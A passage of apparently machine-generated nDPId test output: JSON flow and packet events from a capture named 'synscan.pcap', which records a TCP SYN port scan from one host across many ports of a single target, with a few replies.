-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsvHwAADMGWPasEAAIQA2GNIzSA+HdUoMYAAAAAGACEAAkrgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsMtIAACsG6qCsEAAIQA2GNIzSAG7dUoMYAAAAAGACEAAoIQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsXl8AAC8GuxOsEAAIQA2GNIzSH5DdUoMYAAAAAGACEAAI\/wAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsGxAAACsGAmOsEAAIQA2GNIzSBrjdUoMYAAAAAGACEAAh1wAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsWWoAACoGxQisEAAIQA2GNIzSABndUoMYAAAAAGACDAAsdgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs03wAADEGQ\/asEAAIQA2GNIzSAb3dUoMYAAAAAGACCAAu0gAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsszkAADEGZDmsEAAIQA2GNIzSAQDdUoMYAAAAAGACCAAvjwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsKoIAACkG9PCsEAAIQA2GNIzSAirdUoMYAAAAAGACCAAuZQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AACsGyFOsEAAIQA2GNIzSAIfdUoMYAAAAAGACEAAoCAAAAgQFtA=="} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DEAADAGREGsEAAIQA2GNIzSABbdUoMYAAAAAGACBAA0eQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1H4AADMGQPSsEAAIQA2GNIzSIrjdUoMYAAAAAGACEAAF1wAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs0TgAACYGUTqsEAAIQA2GNIzSAiTdUoMYAAAAAGACDAAqawAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACAAZjNIefGtp3VKDGVAUAADGOQAAAAAAAAAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAseeEAACgGppGsEAAIQA2GNIzSBCDdUoMYAAAAAGACBAAwbwAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRVMAACsG2B+sEAAIQA2GNIzSKYXdUoMYAAAAAGACEAD\/CQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRm4AADAG0gSsEAAIQA2GNIzSCi3dUoMYAAAAAGACBAAqYgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsnToAADAGezisEAAIQA2GNIzSKX3dUoMYAAAAAGACBAALEgAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAskEcAADcGgSusEAAIQA2GNIzSA97dUoMYAAAAAGACEAAksQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAs0R4AADcGQFSsEAAIQA2GNIzSFSbdUoMYAAAAAGACEAATaQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqYAACwGrcysEAAIQA2GNIzSCK7dUoMYAAAAAGACBAAr4QAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsJyoAADQG7UisEAAIQA2GNIzSF3DdUoMYAAAAAGACBAAdHwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsfqQAACwGnc6sEAAIQA2GNIzSBpfdUoMYAAAAAGACBAAt+AAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAskxYAACsGilysEAAIQA2GNIzSBNHdUoMYAAAAAGACEAAjvgAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsCEIAADAGEDGsEAAIQA2GNIzSB+7dUoMYAAAAAGACBAAsoQAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
